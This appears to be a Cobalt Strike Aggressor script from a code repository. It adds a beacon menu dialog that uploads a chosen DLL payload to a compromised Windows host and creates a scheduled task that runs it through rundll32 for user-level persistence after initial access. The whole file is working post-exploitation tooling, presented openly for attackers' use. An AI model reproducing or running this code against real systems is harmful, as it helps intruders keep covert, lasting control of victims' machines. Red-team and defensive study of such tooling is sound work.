40 lines
1.7 KiB
Plaintext
40 lines
1.7 KiB
Plaintext
#User Schtasks Persistence
|
|
#Author: @r3dQu1nn
|
|
#Runs as current user for the selected beacon
|
|
#Meant for quick user level persistence upon initial access
|
|
#Thanks to @noone and bluescreenofjeff for help
|
|
|
|
sub persistUserSchtasks {
|
|
$bid = $1;
|
|
$dialog = dialog("User Schtasks Persistence", %(taskname => "Evil Task Name..", targetpath => "Target Path..", user => "User to Run as..", schedule => "Schedule modifier..", payloadfile => "Select DLL Payload.."), lambda({
|
|
if ("$3['taskname']" ismatch 'Evil Task Name..' || "$3['targetpath']" ismatch 'Target Path..' || "$3['payloadfile']" ismatch 'Select DLL Payload..' || "$3['user']" ismatch 'User to Run as..' || "$3['schedule']" ismatch 'Schedule modifier..') {
|
|
berror($bid, "\c4Please enter a valid Task Name, Target Path, Schedule Modifier, and a valid Payload File.");
|
|
break;
|
|
}
|
|
else {
|
|
bcd($bid, $3['targetpath']);
|
|
bupload($bid, $3['payloadfile']);
|
|
bpowerpick($bid, 'schtasks /create /tn "'.$3['taskname'].'" /tr "C:\Windows\System32\rundll32.exe '.$3['targetpath']."\\".split("/",$3['payloadfile'])[-1].',StartW" /ru "'.$3['user'].'" /sc "'.$3['schedule'].'"');
|
|
bpowerpick($bid, 'schtasks /query /v /tn "'.$3['taskname'].'" /FO list');
|
|
}
|
|
}));
|
|
|
|
dialog_description($dialog, "User Schtasks Persistence - Generates a schtask for persistence on selected beacon.");
|
|
|
|
drow_text($dialog, "taskname", "Schtasks Taskname:");
|
|
drow_text($dialog, "user", "User to Run as:");
|
|
drow_text($dialog, "targetpath", "Target Path:");
|
|
drow_text($dialog, "schedule", "Schedule Modifier:");
|
|
drow_file($dialog, "payloadfile", "DLL Payload:");
|
|
|
|
dbutton_action($dialog, "Create");
|
|
dialog_show($dialog);
|
|
|
|
}
|
|
|
|
popup beacon_bottom {
|
|
item "User Schtasks Persistence" {
|
|
persistUserSchtasks($1);
|
|
}
|
|
}
|